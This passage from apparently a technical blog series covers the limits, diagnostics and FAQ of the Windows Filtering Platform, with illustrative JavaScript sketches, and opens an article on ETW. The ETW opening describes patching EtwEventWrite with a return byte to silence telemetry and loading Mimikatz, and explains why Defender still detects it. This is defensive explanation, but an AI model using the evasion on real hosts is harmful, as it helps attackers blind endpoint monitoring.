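  const fullLabel = Buffer.from('tls13 ' + label, 'ascii');
  const info = Buffer.concat([
    Buffer.from([length >> 8, length & 0xff, fullLabel.length]),
    fullLabel,
    Buffer.from([0]), // zero-length context
  ]);
  // HKDF-Expand: T(i) = HMAC(secret, T(i-1) || info || i), concatenated.
  let block = Buffer.alloc(0);
  let output = Buffer.alloc(0);
  for (let i = 1; output.length < length; i++) {
    block = crypto.createHmac('sha256', secret).update(Buffer.concat([block, info, Buffer.from([i])])).digest();
    output = Buffer.concat([output, block]);
  }
  return output.subarray(0, length);
}

// Everything needed is the DCID from the first Initial packet's long header.
function clientInitialKeys(dcid) {
  const initialSecret = hkdfExtract(QUIC_V1_INITIAL_SALT, dcid);
  const clientSecret = hkdfExpandLabel(initialSecret, 'client in', 32);
  return {
    initialSecret,
    key: hkdfExpandLabel(clientSecret, 'quic key', 16), // AES-128-GCM packet key
    iv: hkdfExpandLabel(clientSecret, 'quic iv', 12),
    hp: hkdfExpandLabel(clientSecret, 'quic hp', 16), // header-protection key
  };
}
```

RFC 9001 Appendix A.1 publishes test vectors for the Destination Connection ID `0x8394c8f03e515708`, which can be used to check the sketch. In a kernel callout, the same arithmetic plus AES-GCM and header-protection removal would be the minimum cost of reading a ClientHello.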

Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers. -- Microsoft Defender for Endpoint, *Network Protection* [@mde-netprot]

That sentence is the encryption ceiling in Microsoft's own words. The product can still block by 5-tuple (source and destination address, source and destination port, protocol). It cannot block by hostname inside a Chrome or Firefox tab that is speaking QUIC unless QUIC and Encrypted Client Hello are disabled in that browser. The limit is information-theoretic: a kernel filter without the session keys cannot read the encrypted payload, and no engineering change inside WFP can lift it. The fix lives in the browser or in a user-mode TLS-inspecting proxy.

The offload ceiling

The second ceiling comes from hardware. Modern NICs do work that the kernel used to do, because doing it in hardware is faster. UDP Receive Segment Coalescing Offload, the marquee feature of NDIS 6.89 in Windows 11 24H2, is the cleanest example: "URO enables network interface cards (NICs) to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@uro].

The "logically contiguous buffer" is the problem. A WFP callout written against the pre-URO semantics ("one indication at FWPM_LAYER_DATAGRAM_DATA_V4 is one UDP datagram") is silently wrong on a system where the NIC has coalesced several datagrams into one Network Buffer List. The callout that needs per-datagram inspection has to read NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO to learn the per-flow size and unfold the indication accordingly [@uro]. The mechanical bound is that work the NIC has aggregated has lost its per-packet boundary by the time the kernel sees it.
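A callout that still needs per-datagram semantics has to undo the coalescing itself. The sketch below models that step in JavaScript under stated assumptions. The coalesced indication is a single byte array. `segmentSize` stands in for the size URO reports through `NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO`; the real structure's members are not modelled. Every datagram except possibly the last is assumed to have that size. `splitCoalescedUdp` is a hypothetical name, not an NDIS routine.

```javascript
// Hypothetical model of a URO-coalesced indication: one byte array plus the
// segment size the NIC reported. Assumes every datagram but the last has
// exactly segmentSize bytes and the last has between 1 and segmentSize.
function splitCoalescedUdp(payload, segmentSize) {
  if (!Number.isInteger(segmentSize) || segmentSize <= 0) {
    throw new RangeError('segmentSize must be a positive integer');
  }
  const datagrams = [];
  for (let offset = 0; offset < payload.length; offset += segmentSize) {
    // subarray shares memory with the original buffer, so nothing is copied.
    datagrams.push(payload.subarray(offset, Math.min(offset + segmentSize, payload.length)));
  }
  return datagrams;
}
```

A 3,000-byte indication with a 1,200-byte segment size splits into datagrams of 1,200, 1,200, and 600 bytes. A callout written under the legacy one-indication-per-datagram assumption would have inspected all three as a single datagram.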

Note: A callout at FWPM_LAYER_DATAGRAM_DATA_V4 or _V6 that assumes "one NBL = one datagram" is silently wrong on Windows 11 24H2 systems with URO-capable NICs. Read the per-flow size from NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO and iterate. The change is documented in the URO reference page [@uro], but legacy callouts written before NDIS 6.89 will need an explicit audit.

The same shape repeats for TCP segmentation offload (TSO, LSO), receive offload (LRO, GRO), and TLS / IPsec / RDMA / VxLAN / GENEVE offload. Each one moves work to hardware. Each one weakens the kernel-filter assumption that "every packet flows past every layer."

The kernel attack surface

The third ceiling is the one that drives the CVE cadence. Every callout is a kernel module [@wfp-callouts]. Every byte that crosses the Fwpm* user-to-kernel boundary is a potential primitive for an elevation-of-privilege exploit [@nvd-2023-29368][@nvd-2024-38034]. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free in the WFP code path with a CVSS base of 7.0 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.0, and an impact sub-score of 5.9 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow in the same family of code paths with a CVSS base of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.8, and an impact sub-score of 5.9 [@nvd-2024-38034].
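The CWE-190 class behind the 2024 CVE is easy to show in miniature. The sketch below is not the vulnerable WFP code path, which this article does not describe. It is a hypothetical 32-bit size computation, modelled in JavaScript with `Math.imul` and `>>> 0` to reproduce C-style unsigned wraparound, placed next to the checked version that a user-to-kernel boundary needs.

```javascript
// Hypothetical request-handler arithmetic, not the CVE-2024-38034 code path.
// Math.imul multiplies as 32-bit integers; ">>> 0" reinterprets the result as
// unsigned, which reproduces C's uint32_t wraparound.
function uncheckedAllocSize(count, elementSize) {
  return Math.imul(count, elementSize) >>> 0;
}

// Checked version: refuse any request whose byte size would not fit in 32 bits.
function checkedAllocSize(count, elementSize) {
  const UINT32_MAX = 0xffffffff;
  if (elementSize !== 0 && count > Math.floor(UINT32_MAX / elementSize)) {
    return null; // overflow: reject instead of wrapping
  }
  return count * elementSize;
}
```

With 268,435,457 (`0x10000001`) sixteen-byte elements, the unchecked product wraps to 16 bytes. A buffer sized from that result would be overrun by the first copy loop that trusts `count`. The checked version rejects the request.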

The CVSS vector difference is worth reading carefully. Between the two CVEs, attack complexity dropped from AC:H to AC:L and the exploitability sub-score rose from 1.0 to 1.8, so the 2024 bug is the easier one to weaponise [@nvd-2023-29368][@nvd-2024-38034]. Two data points are not a trend. Between these two anchor CVEs, though, the direction of travel is toward easier exploitation, not harder.
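The quoted scores follow mechanically from the vectors. The sketch below implements the CVSS v3.1 base-score equations from FIRST's specification, including that specification's integer-based Roundup function, so the two vectors can be compared side by side. One assumption: NVD's displayed sub-scores are taken to be the raw values rounded to one decimal place.

```javascript
// Metric weights from the FIRST CVSS v3.1 specification (base metrics only).
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  UI: { N: 0.85, R: 0.62 },
  CIA: { H: 0.56, L: 0.22, N: 0 },
};
// Privileges Required is weighted differently when Scope is Changed.
const PR_WEIGHTS = {
  U: { N: 0.85, L: 0.62, H: 0.27 },
  C: { N: 0.85, L: 0.68, H: 0.5 },
};

// Roundup from CVSS v3.1 Appendix A: smallest one-decimal value >= x,
// computed on integers to avoid floating-point artefacts.
function roundup(x) {
  const scaled = Math.round(x * 100000);
  return scaled % 10000 === 0 ? scaled / 100000 : (Math.floor(scaled / 10000) + 1) / 10;
}

// vector: e.g. 'AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H' (a 'CVSS:3.1/' prefix is ignored).
function cvss31(vector) {
  const m = Object.fromEntries(vector.split('/').map((part) => part.split(':')));
  const changed = m.S === 'C';
  const iss = 1 - (1 - WEIGHTS.CIA[m.C]) * (1 - WEIGHTS.CIA[m.I]) * (1 - WEIGHTS.CIA[m.A]);
  const impact = changed ? 7.52 * (iss - 0.029) - 3.25 * Math.pow(iss - 0.02, 15) : 6.42 * iss;
  const exploitability =
    8.22 * WEIGHTS.AV[m.AV] * WEIGHTS.AC[m.AC] * PR_WEIGHTS[m.S][m.PR] * WEIGHTS.UI[m.UI];
  let base = 0;
  if (impact > 0) {
    base = roundup(Math.min((changed ? 1.08 : 1) * (impact + exploitability), 10));
  }
  return {
    base,
    // Sub-scores rounded to one decimal for display.
    exploitability: Math.round(exploitability * 10) / 10,
    impact: Math.round(impact * 10) / 10,
  };
}
```

For the 2023 vector, the function returns a base of 7.0 with sub-scores 1.0 and 5.9. For the 2024 vector, it returns 7.8 with 1.8 and 5.9. The only weight that differs between the two calculations is attack complexity (0.44 versus 0.77).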

There is a structural variant of the same story that does not require any memory-safety bug at all. In August 2021, Forshaw published a Project Zero post titled "Understanding Network Access in Windows AppContainers." The post documents a default-WFP-policy configuration that allows certain low-privilege AppContainer processes to reach the network without any of the capability SIDs (internetClient, internetClientServer, privateNetworkClientServer) that the AppContainer documentation suggests are required [@forshaw-2021]. The associated Project Zero issue, 2207, was marked WontFix by Microsoft; the press coverage at SecurityAffairs reproduces the advisory body verbatim: "The default rules for the WFP connect layers permit certain executables to connect TCP sockets in AppContainers without capabilities leading to elevation of privilege... Eventually an AC process will match the 'Block Outbound Default Rule' rule if nothing else has which will block any connection attempt" [@securityaffairs-2021]. The bug is a policy composition bug, not a code bug. It exists in the way the in-box sublayers, filter weights, and default rules interact -- which is precisely the surface this article spent Section 5 explaining.

Key idea: WFP's hardest limits are not engineering choices Microsoft can rewrite. They are information-theoretic (a kernel filter without session keys cannot read what is encrypted), mechanical (hardware offloads exist to amortise work the kernel filter would have done, and aggregation destroys per-packet ground truth), and structural (every callout is a kernel module, and every Fwpm* call crosses a user-to-kernel ABI). The BFE elevation-of-privilege CVE class is the running cost of a platform sophisticated enough to host every downstream feature Windows ships.

Three ceilings. Is there a structural fix for any of them, or is this what the platform looks like forever?

9. Open Problems -- Where the Engineering Lives

Six questions are live right now. None of them has a clean answer.

QUIC inspection in the kernel. The current best partial result is to block QUIC by 5-tuple and rely on a browser's HTTP/3 fallback to TLS over TCP, where in-box inspection still works. The Defender for Endpoint Network Protection page documents the workaround verbatim: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Anything deeper than 5-tuple inspection on QUIC requires a user-mode proxy that terminates the QUIC connection and re-originates it, which moves the problem out of WFP.
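Blocking "by 5-tuple" still means recognising QUIC, and the sketch below shows how little a datagram-layer filter has to work with. A hypothetical `classifyQuicLongHeader` reads only the fields RFC 9000 leaves in the clear: the header form bit, the long packet type (which header protection does not cover on long headers), the version, and the connection IDs. A hypothetical `shouldDropQuic` policy then drops outbound QUIC v1 Initials on UDP/443 so the browser falls back to TCP. The `flow` object shape is an assumption, not a WFP structure. Neither function receives a hostname.

```javascript
const LONG_PACKET_TYPES = ['Initial', '0-RTT', 'Handshake', 'Retry'];

// Hypothetical classifier over a UDP payload (Uint8Array), reading cleartext fields only.
function classifyQuicLongHeader(udpPayload) {
  // Need first byte, 4-byte version, DCID length; high bit set = long header.
  if (udpPayload.length < 7 || (udpPayload[0] & 0x80) === 0) return null;
  const view = new DataView(udpPayload.buffer, udpPayload.byteOffset, udpPayload.byteLength);
  const version = view.getUint32(1); // big-endian, as on the wire
  if (version !== 0x00000001) return { version, packetType: 'unknown' };
  const dcidLen = udpPayload[5];
  if (dcidLen > 20 || udpPayload.length < 7 + dcidLen) return null;
  const scidLen = udpPayload[6 + dcidLen];
  if (scidLen > 20 || udpPayload.length < 7 + dcidLen + scidLen) return null;
  return {
    version,
    packetType: LONG_PACKET_TYPES[(udpPayload[0] & 0x30) >> 4],
    dcid: Buffer.from(udpPayload.subarray(6, 6 + dcidLen)).toString('hex'),
    scidLength: scidLen,
  };
}

// Hypothetical 5-tuple-plus-header policy: drop outbound QUIC v1 Initials to UDP/443.
function shouldDropQuic(flow, udpPayload) {
  if (flow.protocol !== 'UDP' || flow.remotePort !== 443 || flow.direction !== 'outbound') return false;
  const header = classifyQuicLongHeader(udpPayload);
  return header !== null && header.packetType === 'Initial';
}
```

The decision uses the transport fields and a few cleartext header bits. Everything that would identify the site sits behind Initial-packet protection and, with Encrypted Client Hello, behind real encryption as well.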

Microsoft Defender for Endpoint's exact WFP-layer registration map. Publicly undocumented. Microsoft has published the capability and the limitations [@mde-netprot] but not the precise set of FWPM_LAYER_* GUIDs that Network Protection registers callouts at. Community reverse engineering knows fragments. A definitive map would let third-party EDR vendors avoid sublayer-priority conflicts with Defender. Whether Microsoft publishes one is a product-roadmap question.

The structural shape of the BFE EoP CVE class. Is the BFE elevation-of-privilege CVE class -- CWE-415 in 2023 [@nvd-2023-29368], CWE-190 in 2024 [@nvd-2024-38034], no public impossibility theorem either way -- tail risk inherent to the platform's policy-from-user-mode-to-kernel design? Or is it addressable by an architectural fix (HVCI hardening on fwpkclnt.sys callout paths, bounded ABI contracts on the Fwpm* surface, Rust-in-Windows-kernel for new callout drivers)? The honest answer is that this is open. The integer-overflow / double-free class is the canonical attack surface of any user-to-kernel ABI; the question is whether Microsoft commits to a structural fix or to tail-risk-mitigation-plus-patching.

eBPF for Windows production readiness. Does it displace WFP for new kernel-mode network filters, or does it stay adjacent? The v1.1.0 release in March 2026 was framed as "first stable" while still labelled Pre-release [@ebpf-releases]. The same release added hard/soft permit verdicts to its accept and bind hooks, explicitly mirroring FWPS_RIGHT_ACTION_WRITE in WFP [@ebpf-releases]. That borrowing is a tell -- the project is converging on the WFP arbitration semantics, which suggests the long-term picture is "eBPF for Windows alongside WFP" rather than "eBPF replaces WFP." The market answer is unsettled.

Windows Defender Application Guard's egress-isolation pattern after WDAG deprecation. WDAG for Edge used a WFP-backed egress-isolation pattern to route browsing-container traffic out of an isolated network compartment. The WDAG product surface is being phased out -- Microsoft has documented that "Microsoft Defender Application Guard... is deprecated for Microsoft Edge for Business and will no longer be updated. Starting with Windows 11, version 24H2, Microsoft Defender Application Guard... is no longer available" [@mdag-deprecation]. The pattern's future on Windows -- in containers, virtualization-based security profiles, or some successor -- is undocumented as of the time of writing. Treat this paragraph as conjectural until Microsoft publishes a successor pattern.

NIC offload composability with kernel firewalls. As more pipeline elements move into the NIC -- TSO, LSO, GRO/GSO, URO [@uro], TLS offload, IPsec offload, RDMA, VxLAN, GENEVE -- the assumption that every packet flows past every WFP layer weakens. A callout that registers at FWPM_LAYER_INBOUND_TRANSPORT_V4 may never see a packet whose transport-layer work happened entirely on the NIC. The kernel-firewall design that grew up assuming software ground truth has to renegotiate that assumption release by release. NDIS 6.89's URO is the most recent example [@ndis-689]; there will be more.

"Open" in this section means engineering-open, not theory-open. There is no published impossibility theorem stating that WFP cannot be made provably safe against integer-overflow elevation-of-privilege, or that a kernel firewall cannot inspect encrypted traffic with a key-disclosure protocol, or that NIC offloads cannot be composed with kernel-side filters by sharing flow state. The practical question, in every case, is whether Microsoft and the broader Windows community invest in the structural fix or settle for tail-risk-mitigation plus patching. The answer in 2026 is "mostly the latter."

Six open problems. Now, how do you actually use the platform that has been the subject of this article?

10. The Four Ways You Touch WFP

Whether you are an administrator, a detection engineer, or a kernel driver writer, there are four canonical surfaces you actually touch. Here is the field guide.

The diagnostic surface: `netsh wfp`

Wikipedia's WFP page notes the introduction date: "Starting with Windows 7, the netsh command can diagnose of the internal state of WFP" [@wiki-wfp]. The canonical incident-response triplet is three commands long.

Note: Run these three commands, in this order, before doing anything else when a Windows host shows network-filtering behaviour you cannot explain:

```text
netsh wfp show state file=state.xml
netsh wfp show filters file=filters.xml
netsh wfp capture start file=C:\Temp\wfp.cab
:: reproduce the issue
netsh wfp capture stop
```

Both show commands write their XML to the path given in file= rather than to the console, so redirecting stdout with > would capture only a status message. state.xml is the platform's current rendered configuration: every provider, sublayer, filter, and callout currently registered. filters.xml lists every filter, including effective weight and action. The .cab from netsh wfp capture is the ETW-and-state bundle that goes onto a Microsoft Support case. The netsh wfp family has been around since Windows 7 [@wiki-wfp]; it has not had a major redesign since.

A state.xml from netsh wfp show state is an XML document with one <item> per filter. Each item carries a <displayData> element with a name and description, the layer GUID, the sublayer GUID, the weight, and the action. Reading one is a matter of pattern recognition rather than parsing. The next snippet walks the structure on a hand-pasted fragment.

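```javascript
// A real-world 'netsh wfp show state' output contains many <item> elements
// inside <filters>. The fragment below is a single filter, hand-pasted from
// a 'show state' XML dump.
const xmlFragment = `
<item>
  <filterKey>{deadbeef-1111-2222-3333-444455556666}</filterKey>
  <displayData>
    <name>EDR-vendor outbound TCP inspect</name>
    <description>Vendor X deep-inspection callout filter</description>
  </displayData>
  <layerKey>FWPM_LAYER_ALE_AUTH_CONNECT_V4</layerKey>
  <subLayerKey>{a0192d10-aaaa-bbbb-cccc-1234567890ab}</subLayerKey>
  <weight>
    <type>FWP_UINT64</type>
    <uint64>0x4000000000000064</uint64>
  </weight>
  <action>
    <type>FWP_ACTION_CALLOUT_INSPECTION</type>
  </action>
</item>`;

// Return the text of the first <tag>...</tag>, searching from the optional
// <parent> element onward. Regex extraction is enough for one trusted,
// flat fragment; use a real XML parser for full dumps.
function textOf(xml, tag, parent) {
  let scope = xml;
  if (parent) {
    const start = xml.indexOf(`<${parent}>`);
    if (start === -1) return null;
    scope = xml.slice(start);
  }
  const match = scope.match(new RegExp(`<${tag}>([^<]*)</${tag}>`));
  return match ? match[1].trim() : null;
}

function readFilter(xml) {
  return {
    name: textOf(xml, 'name', 'displayData'),
    layer: textOf(xml, 'layerKey'),
    subLayer: textOf(xml, 'subLayerKey'),
    weight: textOf(xml, 'uint64', 'weight'),
    action: textOf(xml, 'type', 'action'),
  };
}

console.log(readFilter(xmlFragment));
// {
//   name: 'EDR-vendor outbound TCP inspect',
//   layer: 'FWPM_LAYER_ALE_AUTH_CONNECT_V4',
//   subLayer: '{a0192d10-aaaa-bbbb-cccc-1234567890ab}',
//   weight: '0x4000000000000064',
//   action: 'FWP_ACTION_CALLOUT_INSPECTION'
// }
```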

Five fields: name, layer, sublayer, weight, action. That is what every WFP filter resolves to. Reading a hundred of them takes an afternoon.
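Once filters are extracted, weight is the field to sort on, because within a sublayer WFP evaluates filters from highest weight to lowest. One practical trap: FWP_UINT64 weights such as `0x4000000000000064` exceed `Number.MAX_SAFE_INTEGER`, so JavaScript's `Number` silently merges neighbouring weights. The minimal sketch below keeps them as `BigInt`. It assumes records shaped like `readFilter`'s output, and the `rankBySubLayer` helper is hypothetical.

```javascript
// Group filter records by sublayer and sort each group by weight, highest first.
// Weights are FWP_UINT64 hex strings, so they are parsed as BigInt.
function rankBySubLayer(filters) {
  const bySubLayer = new Map();
  for (const f of filters) {
    if (!bySubLayer.has(f.subLayer)) bySubLayer.set(f.subLayer, []);
    bySubLayer.get(f.subLayer).push({ ...f, weightValue: BigInt(f.weight) });
  }
  for (const list of bySubLayer.values()) {
    list.sort((a, b) => (a.weightValue > b.weightValue ? -1 : a.weightValue < b.weightValue ? 1 : 0));
  }
  return bySubLayer;
}
```

`Number('0x4000000000000064') === Number('0x4000000000000065')` evaluates to `true`, because doubles near 2^62 are spaced 1,024 apart. The `BigInt` comparison avoids exactly that collision.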

The administrative surface: `wf.msc`

The Microsoft Management Console snap-in is the surface most Windows users have actually clicked. The MpsSvc service translates every rule created in wf.msc into one or more WFP filters and pushes them over RPC into the BFE, under the MPSSVC provider's sublayers. From there they reach the kernel, where TCPIP.SYS hands each classification to the filter engine [@forshaw-2021]. The UI exposes a small fraction of the filter properties WFP actually models. Advanced rule attributes (per-AppContainer SID, per-package family name, per-service hardening) live only in the underlying filter.

The networking surface: `New-NetNat` and Hyper-V NAT switches

The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]. Each NAT object materialises as a set of WFP filters that perform the translation. Windows containers use the same machinery for their default NAT switch. The Get-NetNat, Remove-NetNat, and related cmdlets in the NetNat PowerShell module are the entry point.

The driver surface: writing a WFP callout

The WDK's "Introduction to Windows Filtering Platform Callout Drivers" page is the entry point for kernel-mode writers [@wfp-callouts]. The reference sample, WFPSampler, lives in the microsoft/Windows-driver-samples repository under network/trans/WFPSampler. The sample's description: "The WFPSampler sample driver is a sample firewall. It has a command-line interface which allows adding filters at various WFP layers with a wide variety of conditions. Additionally it exposes callout functions for injection, basic action, proxying, and stream inspection" [@wfpsampler]. The sample ships four binaries (WFPSampler.Exe, WFPSamplerService.Exe, WFPSamplerCalloutDriver.Sys, and WFPSamplerProxyService.Exe) plus two libraries (WFPSampler.Lib and WFPSamplerSys.Lib). If the WFPSampler installer will not complete without prompting for a reboot, the README documents a workaround [@wfpsampler]. Run RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 131 wfpsampler.inf (note the 131) to install. For the corresponding uninstall codepath, run RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 132 wfpsampler.inf. The trailing number is InstallHinfSection's mode value. The 128 component tells Setup to treat the INF's own directory as the default path. The remainder selects the reboot behaviour: 3 reboots if necessary without asking, and 4 asks only if a reboot is necessary.

A WFP callout driver that originates kernel-mode network I/O should pair with Winsock Kernel.

"Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. WSK is the modern replacement for TDI as the kernel-mode sockets API on Windows Vista and later. Microsoft's WSK introduction makes the split explicit: "Filter drivers should implement the Windows Filtering Platform on Windows Vista, and TDI clients should implement WSK" [@wsk-intro]. WFP filters traffic. WSK opens sockets from inside the kernel. The two interfaces are siblings. Before writing a callout driver, ask: does the policy need per-packet kernel visibility, or would a user-mode service that consumes ETW events from `Microsoft-Windows-WFP` and the firewall's ETW providers be enough? Most logging and detection use cases are answered by ETW. A callout driver is justified when you need to *act on* traffic (drop, redirect, modify, inspect payload), not just *observe* it. The kernel attack surface that comes with a callout, documented in Section 8, is now yours to share once you ship.

The detection-engineering surface lives in ETW. The two providers to know are Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall With Advanced Security. Their event schemas deserve more room than this section has; the cross-reference footer below points at the dedicated ETW article in this series.

You now have a mental map of every place WFP touches a Windows host -- under the firewall UI, under IPsec, under WinNAT, under the Hyper-V vSwitch, under Defender for Endpoint, under every EDR. The FAQ disarms the last eight misconceptions.

11. Frequently Asked Questions

**Is WFP the same thing as Windows Firewall?** No. WFP is the platform; the Windows Firewall (WFAS, service name `MpsSvc`) is one consumer of it. Microsoft's start page makes the relationship explicit: "Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The Base Filtering Engine service (`bfe`) hosts the user-mode side of WFP and accepts policy from `MpsSvc` over RPC [@forshaw-2021]. Two user-mode services and a kernel-mode classification path, one platform.

**Is `fwpkclnt.sys` the WFP filter engine?** No. `fwpkclnt.sys` is the kernel-mode WFP client and export driver. Callout drivers link against `fwpkclnt.lib`, the import library for `fwpkclnt.sys` [@wfp-arch]. The classification path -- the code that walks sublayers and filters -- runs primarily inside `NETIO.SYS`, as Forshaw documents in his Project Zero post [@forshaw-2021]. The shorthand "`fwpkclnt.sys` is the filter engine" is common online and incorrect.

**Are BFE and the Windows Firewall service the same thing?** No. BFE (service name `bfe`) is the Base Filtering Engine -- the platform service that controls WFP and plumbs configuration to other modules, including IPsec keying [@wfp-about]. `MpsSvc` is the Windows Defender Firewall service. `MpsSvc` depends on `bfe`; the dependency is not reciprocal [@forshaw-2021].

**Can a WFP callout read TLS or QUIC traffic?** No. WFP callouts see plaintext only for non-IPsec, non-TLS payloads, or for IPsec traffic where the kernel holds the keys. TLS 1.3 and QUIC are end-to-end encrypted from a callout's perspective; the keys live in user-mode TLS libraries inside the application. Microsoft's own Defender for Endpoint Network Protection documentation acknowledges the limit: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Section 8 calls this the encryption ceiling.

**Is SecureNAT the NAT built on WFP?** No. SecureNAT is an ISA Server / Forefront Threat Management Gateway concept, retired with TMG. The modern Windows-host NAT on WFP is **WinNAT**, managed by the `New-NetNat` PowerShell cmdlet [@netnat]. Windows containers use WinNAT for their default NAT switch. The original input scope that informed this article erroneously referenced "SecureNAT" as a WFP consumer; the focus-premise audit corrected it to WinNAT before drafting began.

**Does WSK stand for "Windows Sockets Kernel"?** No. WSK is **Winsock Kernel**. Microsoft Learn's introduction is unambiguous: "Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. The "WS" comes from "Winsock," the brand name of the original Windows Sockets API.

**Is CVE-2024-21318 the 2024 BFE elevation-of-privilege bug?** No. CVE-2024-21318 is a Microsoft SharePoint Server deserialization remote code execution vulnerability, unrelated to the Base Filtering Engine. The 2024 WFP elevation-of-privilege vulnerability is **CVE-2024-38034**: a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The article's source-verification stage flagged the original scope's CVE attribution error before drafting; the article tracks CVE-2024-38034 and CVE-2023-29368 as the two anchor BFE CVEs.

**Can WFP block QUIC?** Only at the 5-tuple level (addresses, ports, protocol), before or after a connection is established. Once a QUIC connection is up, the encryption ceiling applies and the kernel has no key for the encrypted payload [@mde-netprot]. FQDN-level blocking of QUIC by Network Protection requires QUIC to be disabled in the browser, per Microsoft's own troubleshooting guide [@mde-netprot]. Deep inspection of QUIC content from the kernel is not possible with WFP alone.

See also. The Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall With Advanced Security ETW providers are how detection-engineering teams see WFP from outside the kernel; the dedicated ETW article in this series goes deeper on the provider names, manifests, and parsing. The Antimalware Scan Interface (AMSI) sits on the process-side path that complements WFP's network-side path; the two are siblings, not substitutes. And the \Device\Ipfilterdriver device object that Section 3 retired lives in the Windows Object Manager namespace; the Object Manager article in this series covers that namespace's architecture.

ETW: How Windows 2000's Performance Hack Became the EDR Substrate

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Event Tracing for Windows is the high-rate, kernel-buffered observability bus that every modern Windows EDR consumes. A 2007-era architectural decision -- letting eight sessions read the same provider concurrently -- is what makes multi-vendor coexistence possible on a single host. Microsoft's `Microsoft-Windows-Threat-Intelligence` provider has been gated behind Protected Process Light and an ELAM-signed Antimalware certificate since the Windows 10 Redstone (RS) releases. It fires from the kernel side of memory-modifying syscalls and survives the user-mode `EtwEventWrite` patch class that defined red-team tradecraft from 2020 to 2022. The remaining attack surface -- BYOVD-driven kernel tampering -- is structurally narrowed by the Vulnerable Driver Blocklist, enabled by default since Windows 11 22H2. That leaves a residual sub-microsecond-payload gap as ETW's irreducible "observation, not enforcement" limit.

1. Why didn't the patch silence Defender?

A red-team operator drops onto a Defender-protected box in 2026 [@paragmali-com-war-it] and runs the move that worked five years ago. They locate ntdll!EtwEventWrite in the calling process and write the byte 0xC3 over the function prologue. The calling process now silently fails to emit user-mode ETW events. The .NET CLR provider goes dark. Invoke-Mimikatz loads from execute-assembly without lighting up Microsoft-Windows-DotNETRuntime. Defender catches the credential dump [@paragmali-com-and-the] anyway, four seconds later, and the operator is on a SOC analyst's screen before the shellcode finishes running.

The patch worked. The .NET tracing provider in that process is mute. Attach a debugger and disassemble the function prologue: the first byte is now 0xC3, the near-return opcode [@felixcloutier-ret], and any caller falls straight back to its return address before producing a single event. The technique is the one Adam Chester documented in March 2020 [@xpn-hiding-dotnet], and to a generation of red teamers it has functioned as a near-universal ETW evasion ever since.

So why did Defender still fire?

Because Defender does not consume Microsoft-Windows-DotNETRuntime to detect a credential dump. It consumes Microsoft-Windows-Threat-Intelligence [@fluxsec-eti]. That provider's GUID is {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, its events fire from inside the kernel side of memory-modifying syscalls, and the user-mode patcher cannot reach its producer. The patch operated on an ntdll trampoline. The signal Defender used was emitted from a different layer entirely.

Key idea: Modern Windows EDR is layered on ETW, and the layers fail under different attacks.

That single asymmetry -- one provider goes dark to a one-byte patch, another fires from a place the patcher cannot touch -- is the spine of this article. Around it sits a 26-year story of one Microsoft team accidentally building the substrate of every modern Windows endpoint security product.

A high-rate, kernel-buffered tracing facility built into Windows since 2000. Components called *providers* emit events tagged with a GUID; *controllers* configure trace sessions; *consumers* subscribe to live event streams or read recorded `.etl` files. ETW was designed for low-overhead developer diagnostics; it was retrofitted into the security-telemetry substrate that all modern Windows EDR products consume.

A class of endpoint security product that ingests behavioural telemetry (process creation, image load, memory allocation, network connection, registry change), correlates it against detection logic, and produces alerts and response actions. On Windows, the dominant EDRs (Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Elastic Defend, Wazuh, Sysmon-plus-SIEM) all build on ETW or on the same kernel callbacks ETW exposes to the user-mode tier.

To understand why a one-byte patch silences one provider but not another, we have to go back to a Windows 2000 design decision about per-CPU ring buffers.

2. ETW in Windows 2000: the performance problem that started it all

Imagine a 1999 network-driver author. A customer's NT4 production server is corrupting packets under load and the only available instrumentation is DbgPrint. Each call serialises through a kernel debug port, costs measurable percentage points of CPU on a busy box, and ships data to whoever happens to have the kernel debugger attached. The customer says no. The bug reproduces only at production traffic levels. You cannot ship enough printf-debugging through a debug port to find it.

That is the engineering pain Insung Park and Ricky Buch's team was solving when ETW shipped with Windows 2000. Their design moves -- recorded years later in the definitive April 2007 MSDN Magazine article on the Vista upgrade [@ms-park-buch-2007] -- still define the architecture two and a half decades later.

The first move was per-CPU ring buffers. A producer on CPU 7 writes to CPU 7's buffer with no lock contention against producers on other CPUs. Hot-path tracing on a 64-core machine does not serialise. The kernel allocates at least two buffers per logical processor [@ms-event-trace-props] so a producer can keep writing while a writer thread drains the previous buffer.

The second move was an asynchronous writer thread. The producer never blocks on disk I/O. It writes to its CPU's buffer and returns. A separate kernel thread drains buffers to file or hands them to a real-time consumer. ETW pushes the latency tax onto the consumer and the storage path, never onto the producer's hot loop.
